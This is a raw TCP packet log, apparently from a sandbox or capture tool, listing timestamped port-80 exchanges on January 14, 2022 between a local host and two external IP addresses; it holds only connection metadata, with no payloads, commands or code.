Jan 14, 2022 00:16:13.742408037 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.742481947 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.752866030 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.779715061 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.779764891 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.779803991 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.779843092 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.779860973 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.779881954 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.779911041 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.779922962 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.779963970 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.779984951 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.780003071 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780051947 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780062914 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.780075073 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780106068 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780137062 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.780144930 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780185938 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780209064 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.780225039 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780265093 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780283928 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.780306101 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780344963 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780364990 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.780384064 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780422926 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780441999 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.780463934 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780503035 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780525923 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.780544043 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780586004 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780601978 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.780625105 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780663013 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780683994 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.780703068 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780744076 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780760050 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.780783892 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780822039 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780842066 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.780862093 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780900955 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780919075 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.780941010 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780980110 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.780997992 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.781019926 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781058073 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781075001 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.781097889 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781133890 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781155109 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.781172037 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781209946 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781236887 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.781246901 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781286955 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781305075 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.781325102 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781363010 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781383991 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.781410933 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781467915 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781469107 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.781510115 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781548977 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781569958 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.781585932 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781625032 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781651974 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.781661987 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781701088 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781729937 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.781740904 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781791925 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781824112 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.781830072 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781891108 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.781898975 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781939030 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.781975985 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782005072 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.782013893 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782052040 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782073975 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.782090902 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782130003 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782145977 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.782166958 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782205105 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782224894 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.782243967 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782279968 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782298088 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.782318115 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782356024 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782377958 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.782393932 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782433033 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782455921 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.782478094 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782516956 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782536983 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.782555103 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782592058 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782613039 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.782632113 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782671928 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782694101 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.782711983 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782751083 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782769918 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.782788038 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782826900 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782845974 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.782866001 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782902956 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782924891 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.782941103 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.782978058 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.783004045 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.783016920 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.783056021 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.783073902 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.783093929 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.783133030 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.783154964 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.783170938 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.783207893 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.783229113 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.783246040 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.783284903 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.783303976 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.783324003 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.783364058 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.783381939 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.783400059 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.783437967 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.783456087 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.783478975 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.783514977 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.783535957 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.783555031 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.783591986 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.783612967 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.783631086 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.783688068 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.795424938 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.806708097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.806900024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.807030916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.807172060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.807292938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.807411909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.807532072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.807663918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.807781935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.807898998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.808020115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.808140993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.808258057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.808372974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.808491945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.808612108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.808741093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.808854103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.808973074 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.809092999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.809212923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.809330940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.809452057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.809571028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.809736967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.809859037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.809984922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.810103893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.810226917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.810379028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.810472965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.810565948 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.810614109 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.810642958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.810653925 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.810693026 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.810708046 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.810736895 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.810758114 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.810779095 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.810815096 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.810843945 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.810853004 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.810890913 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.810915947 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.810930014 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.810971022 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.810992956 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.811008930 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811048031 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811085939 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811086893 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.811125040 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811141014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.811151981 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.811165094 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811203003 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811228037 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.811244011 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811284065 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811304092 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.811321974 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811337948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.811361074 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811393976 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.811399937 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811438084 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811464071 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.811479092 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811500072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.811518908 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811542988 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.811558008 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811598063 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811619043 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.811635017 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811672926 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811697960 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.811711073 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811747074 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811769009 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.811784029 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811799049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.811824083 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811846972 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.811861992 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811902046 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811922073 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.811938047 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811975956 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.811997890 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.812012911 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.812051058 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.812071085 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.812092066 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.812148094 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.812154055 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.812186956 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.812232971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.812235117 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.812266111 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.812289000 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.812323093 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.812357903 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.812370062 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.812411070 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.812447071 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.812462091 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.812500954 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.812532902 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.812541008 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.812596083 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.812622070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.812623978 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.812674046 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.812690020 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.812768936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.812887907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.812983990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.813079119 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.813174963 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.813280106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.813409090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.813518047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.813615084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.813715935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.813817024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.813920021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.814049006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.814176083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.814285994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.814383030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.814490080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.814589977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.814688921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.814785004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.814882994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.814975977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.815088987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.815184116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.815289021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.815385103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.815480947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.815581083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.815677881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.815773964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.815867901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.815972090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.816068888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.816171885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.816267014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.816361904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.816457987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.816554070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.816662073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.816766977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.816859007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.816972017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.817078114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.817194939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.817270041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.817368984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.817451000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.817560911 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.817660093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.817758083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.817856073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.817990065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.818090916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.818161011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.818249941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.818353891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.818445921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.818546057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.818650961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.818753958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.818834066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.818938971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.819005966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.819106102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.819202900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.819297075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:13.820307016 CET	49916	80	192.168.2.4	185.163.204.24
Jan 14, 2022 00:16:13.822170973 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.822213888 CET	80	49916	185.163.204.24	192.168.2.4
Jan 14, 2022 00:16:13.822253942 CET	80	49916	185.163.204.24	192.168.2.4
